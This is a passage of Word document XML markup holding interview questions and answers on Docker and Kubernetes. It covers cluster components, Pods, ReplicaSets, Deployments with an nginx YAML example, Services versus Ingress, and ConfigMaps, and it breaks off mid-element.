      <w:bookmarkStart w:id="203" w:name="_Toc178383385"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20. What is the difference between Docker Image and Docker Container?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="3038A6B2" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FC97E" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker Image:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A read-only template that contains the application code, runtime, libraries, and dependencies needed to run an application. Images are immutable and can be shared across environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E671C" w14:textId="1435E54D" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker Container:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A runtime instance of a Docker image. It’s an executable package of software that runs on top of a Docker Engine. Containers are isolated, portable, and ephemeral.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B4A39E" w14:textId="0DD9040F" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D5A56" w14:textId="6B176037" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Toc178383386"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w14:paraId="49BE7B73"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here’s a list of Kubernetes interview questions along with detailed answers that cover various aspects of Kubernetes, including its core concepts, architecture, operations, and best practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92C67E"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05" w:name="_Toc178383387"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. What is Kubernetes, and what are its main components?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="38D58FD7"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Kubernetes is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications. It is widely used for managing complex, microservices-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FBEA31"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Main Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225457C2" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Master Node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B76DFE" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API Server:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The front-end for the Kubernetes control plane, handling all RESTful interactions and acting as the gateway to the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50036BCF" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>etcd:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A distributed key-value store that holds the cluster configuration and state data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4BC96E" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Controller Manager:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manages controllers that regulate the state of the cluster, ensuring it matches the desired configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B43A6" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scheduler:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assigns workloads (Pods) to appropriate worker nodes based on resource availability and policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF041C" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Worker Nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD609D" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubelet:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> An agent that runs on each worker node, ensuring the containers are running as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B605AF4" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kube-proxy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manages networking and load balancing for services on each node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DF61F" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container Runtime:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The software responsible for running containers (e.g., Docker, containerd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0327AE93"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06" w:name="_Toc178383388"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. What is a Pod in Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w14:paraId="2460F06E"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Pod is the smallest deployable unit in Kubernetes and represents a single instance of a running process in the cluster. It can contain one or more containers that share the same network namespace, IP address, and storage. Pods are usually used to run a single container but can also run multiple tightly coupled containers that need to share resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F47A30"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07" w:name="_Toc178383389"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. What is a ReplicaSet in Kubernetes, and how is it different from a ReplicationController?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="7F006631"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ReplicaSet ensures that a specified number of identical Pods are running at all times. It automatically replaces any Pods that fail, are deleted, or are terminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D4F13"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Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF6DB0" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ReplicaSet:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supports set-based label selectors (e.g., matchExpressions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580FADFC" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ReplicationController:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supports only equality-based label selectors (e.g., matchLabels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C928D76"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In practice, ReplicaSet is preferred over ReplicationController due to its additional flexibility and features. However, Deployment is often used instead of ReplicaSet because it provides more advanced features for managing Pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49DDCE"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08" w:name="_Toc178383390"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. What is a Deployment in Kubernetes, and how do you use it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w14:paraId="25CEFE15"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Deployment is a higher-level abstraction that manages ReplicaSets and provides declarative updates to Pods. It allows you to easily roll out updates, roll back to previous versions, scale the number of Pods, and pause/resume deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F621BB"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Example of a Deployment YAML file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8E639"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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A502A7"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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563BABA"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFF474A"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name: nginx-deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555EB3EE"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D298755"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replicas: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D398180"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1229D921"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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B815B"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app: nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E6D02"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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D489D3F"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C56A95"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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519690CC"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app: nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183DC491"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AABC14"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE1717"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name: nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8C6AA"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image: nginx:1.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7A4497"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA65715"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containerPort: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34678EC8"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09" w:name="_Toc178383391"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Explain the difference between a Service and an Ingress in Kubernetes.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="03DD5372"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p>
    <w:p w14:paraId="5CD6E626" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Service:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> An abstraction that defines a logical set of Pods and a policy for accessing them. It provides stable networking for Pods, even if their IP addresses change. Services can expose Pods internally (ClusterIP), externally (NodePort, LoadBalancer), or via an externalName.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B482050" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ingress:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> An API object that manages external access to Services, typically via HTTP/HTTPS. Ingress provides load balancing, SSL termination, and name-based virtual hosting. It is more powerful than a Service when dealing with complex routing rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C751A"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0" w:name="_Toc178383392"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. What are ConfigMaps and Secrets in Kubernetes? How are they different?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w14:paraId="4DF550B1"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p>
    <w:p w14:paraId="572585DE" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ConfigMap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used to store non-confidential data in key-value pairs. ConfigMaps are typically used to pass configuration data (e.g., environment variables, command-line arguments) to Pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D813F" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
